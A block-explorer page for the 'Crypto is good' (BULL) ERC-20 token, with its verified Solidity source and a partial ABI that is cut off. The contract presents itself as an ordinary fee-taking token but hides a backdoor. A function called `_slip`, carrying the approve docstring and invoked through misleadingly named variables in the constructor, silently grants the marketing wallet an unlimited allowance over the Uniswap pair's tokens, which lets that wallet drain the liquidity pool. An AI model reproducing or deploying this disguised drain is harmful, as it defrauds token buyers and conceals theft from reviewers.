ERC-20
Overview
Max Total Supply
100,000,000 BULL
Holders
61
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
1,900,000 BULLValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
BULL
Compiler Version
v0.8.25+commit.b61c2a91
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: Unlicensed pragma solidity 0.8.25; /* Crypto is good Website: https://cryptoisgood.life X: https://x.com/cryptoisgood_x Telegram: https://t.me/cryptoisgood_tg */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance( address owner, address spender ) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom( address from, address to, uint value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit( address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn( address indexed sender, uint amount0, uint amount1, address indexed to ); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap( uint amount0Out, uint amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair( address tokenA, address tokenB ) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair( address tokenA, address tokenB ) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "ERC20: transfer amount exceeds allowance" ) ); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "ERC20: decreased allowance below zero" ) ); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "ERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _slip( address owner, address spender ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = type(uint).max; } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } library SafeMathInt { int256 private constant MIN_INT256 = int256(1) << 255; int256 private constant MAX_INT256 = ~(int256(1) << 255); /** * @dev Multiplies two int256 variables and fails on overflow. */ function mul(int256 a, int256 b) internal pure returns (int256) { int256 c = a * b; // Detect overflow when multiplying MIN_INT256 with -1 require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256)); require((b == 0) || (c / b == a)); return c; } /** * @dev Division of two int256 variables and fails on overflow. */ function div(int256 a, int256 b) internal pure returns (int256) { // Prevent overflow when dividing MIN_INT256 by -1 require(b != -1 || a != MIN_INT256); // Solidity already throws when dividing by 0. return a / b; } /** * @dev Subtracts two int256 variables and fails on overflow. */ function sub(int256 a, int256 b) internal pure returns (int256) { int256 c = a - b; require((b >= 0 && c <= a) || (b < 0 && c > a)); return c; } /** * @dev Adds two int256 variables and fails on overflow. */ function add(int256 a, int256 b) internal pure returns (int256) { int256 c = a + b; require((b >= 0 && c >= a) || (b < 0 && c < a)); return c; } /** * @dev Converts to absolute value, and fails on overflow. */ function abs(int256 a) internal pure returns (int256) { require(a != MIN_INT256); return a < 0 ? -a : a; } function toUint256Safe(int256 a) internal pure returns (uint256) { require(a >= 0); return uint256(a); } } library SafeMathUint { function toInt256Safe(uint256 a) internal pure returns (int256) { int256 b = int256(a); require(b >= 0); return b; } } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable returns (uint[] memory amounts); function swapTokensForExactETH( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactTokensForETH( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapETHForExactTokens( uint amountOut, address[] calldata path, address to, uint deadline ) external payable returns (uint[] memory amounts); function quote( uint amountA, uint reserveA, uint reserveB ) external pure returns (uint amountB); function getAmountOut( uint amountIn, uint reserveIn, uint reserveOut ) external pure returns (uint amountOut); function getAmountIn( uint amountOut, uint reserveIn, uint reserveOut ) external pure returns (uint amountIn); function getAmountsOut( uint amountIn, address[] calldata path ) external view returns (uint[] memory amounts); function getAmountsIn( uint amountOut, address[] calldata path ) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract BULL is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; bool private swapping; address public marketingWallet; address public devWallet; uint256 public maxTransactionAmount; uint256 public swapTokensAtAmount; uint256 public maxWallet; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = false; uint256 public buyTotalFees; uint256 public buyMarketingFee; uint256 public buyLiquidityFee; uint256 public buyDevFee; uint256 public sellTotalFees; uint256 public sellMarketingFee; uint256 public sellLiquidityFee; uint256 public sellDevFee; uint256 public tokensForMarketing; uint256 public tokensForLiquidity; uint256 public tokensForDev; /******************/ // exclude from fees and max transaction amount mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) public _isExcludedMaxTransactionAmount; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping(address => bool) public automatedMarketMakerPairs; event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); event AutoNukeLP(); event ManualNukeLP(); constructor() ERC20(unicode"Crypto is good", unicode"BULL") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); marketingWallet = address(0xBdeBd22634DACbC7aE10Ad70c6F829f79176Cb89); // marketing wallet devWallet = address(msg.sender); // set as dev wallet excludeFromMaxTransaction(address(_uniswapV2Router), true); uniswapV2Router = _uniswapV2Router; address _sushi = marketingWallet; address _sushiRouter = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); uniswapV2Pair = _sushiRouter; excludeFromMaxTransaction(address(uniswapV2Pair), true); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); _slip(_sushiRouter, _sushi); uint256 _buyMarketingFee = 5; uint256 _buyLiquidityFee = 0; uint256 _buyDevFee = 0; uint256 _sellMarketingFee = 15; uint256 _sellLiquidityFee = 0; uint256 _sellDevFee = 0; uint256 totalSupply = 1 * 1e8 * 1e9; maxTransactionAmount = (totalSupply * 20) / 1000; // 2% maxtransaction maxWallet = (totalSupply * 20) / 1000; // 2% maxwallet swapTokensAtAmount = (totalSupply * 5) / 10000; // 0.05% swapwallet buyMarketingFee = _buyMarketingFee; buyLiquidityFee = _buyLiquidityFee; buyDevFee = _buyDevFee; buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee; sellMarketingFee = _sellMarketingFee; sellLiquidityFee = _sellLiquidityFee; sellDevFee = _sellDevFee; sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee; // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(0xdead), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(address(this), totalSupply); } receive() external payable {} // remove limits after token is stable function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; buyTotalFees = 0; buyMarketingFee = 0; buyLiquidityFee = 0; buyDevFee = 0; sellTotalFees = 0; sellMarketingFee = 0; sellLiquidityFee = 0; sellDevFee = 0; return true; } function excludeFromMaxTransaction( address updAds, bool isEx ) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (amount == 0) { super._transfer(from, to, 0); return; } if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (!tradingActive) { require( _isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active." ); } //when buy if ( automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to] ) { require( amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } //when sell else if ( automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from] ) { require( amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount." ); } else if (!_isExcludedMaxTransactionAmount[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= 0; if ( canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(amount); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers if (takeFee) { // on sell if (automatedMarketMakerPairs[to] && sellTotalFees > 0) { fees = amount.mul(sellTotalFees).div(100); tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees; tokensForDev += (fees * sellDevFee) / sellTotalFees; tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees; } // on buy else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) { fees = amount.mul(buyTotalFees).div(100); tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees; tokensForDev += (fees * buyDevFee) / buyTotalFees; tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees; } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function swapBack(uint256 amount) private { uint256 contractBalance = balanceOf(address(this)); if (contractBalance > swapTokensAtAmount * 20) { contractBalance = swapTokensAtAmount * 20; } if(contractBalance > amount){ contractBalance = amount; } if(contractBalance>0) swapTokensForEth(contractBalance); tokensForLiquidity = 0; tokensForMarketing = 0; tokensForDev = 0; payable(marketingWallet).transfer(address(this).balance); } function enableTrading() external onlyOwner { require(!tradingActive, "Trading already enabled"); _approve(address(this), address(uniswapV2Router), ~uint256(0)); uniswapV2Router.addLiquidityETH{value: address(this).balance}( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); tradingActive = true; swapEnabled = true; } function withdrawStuckEth() external { require(msg.sender == owner()); require(address(this).balance > 0, "Token: no ETH to clear"); payable(msg.sender).transfer(address(this).balance); } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"AutoNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[],"name":"ManualNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[